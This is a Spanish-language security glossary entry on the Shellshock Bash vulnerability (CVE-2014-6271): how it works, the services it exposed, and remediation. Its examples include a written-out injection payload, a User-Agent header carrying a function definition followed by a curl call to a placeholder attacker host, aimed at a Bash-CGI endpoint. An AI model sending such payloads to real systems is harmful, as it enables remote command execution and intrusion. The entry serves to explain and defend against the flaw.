Shellshock (CVE-2014-6271)
¿Qué es Shellshock (CVE-2014-6271)?
Shellshock (CVE-2014-6271)Vulnerabilidad de 2014 en GNU Bash que permitía ejecutar comandos arbitrarios al fijar variables de entorno especialmente diseñadas y pasarlas a Bash a través de otros programas.
Shellshock (CVE-2014-6271, junto con la relacionada CVE-2014-7169) es un fallo en cómo GNU Bash analizaba definiciones de función almacenadas en variables de entorno: los comandos posteriores al cuerpo de la función se ejecutaban al iniciar la shell. Como muchos servicios —CGI, clientes DHCP, OpenSSH ForceCommand, qmail— invocaban Bash con variables controlables por el atacante, el bug era trivialmente explotable de forma remota, a menudo como root. La divulgación de 2014 disparó una oleada mundial de parches y una explotación masiva para botnets, webshells y gusanos. La remediación pasa por actualizar Bash, sustituir arquitecturas Bash-CGI heredadas y aplicar defensa en profundidad: bajar privilegios y restringir el paso de variables.
● Ejemplos
- 01
Enviar un User-Agent como () { :; }; /bin/curl attacker.com a un endpoint Bash-CGI para obtener shell inversa.
- 02
Explotar un cliente DHCP que exporta cadenas de opción al entorno de un hook Bash.
● Preguntas frecuentes
¿Qué es Shellshock (CVE-2014-6271)?
Vulnerabilidad de 2014 en GNU Bash que permitía ejecutar comandos arbitrarios al fijar variables de entorno especialmente diseñadas y pasarlas a Bash a través de otros programas. Pertenece a la categoría de Vulnerabilidades en ciberseguridad.
¿Qué significa Shellshock (CVE-2014-6271)?
Vulnerabilidad de 2014 en GNU Bash que permitía ejecutar comandos arbitrarios al fijar variables de entorno especialmente diseñadas y pasarlas a Bash a través de otros programas.
¿Cómo defenderse de Shellshock (CVE-2014-6271)?
Las defensas contra Shellshock (CVE-2014-6271) combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para Shellshock (CVE-2014-6271)?
Nombres alternativos comunes: Bashdoor, CVE-2014-6271.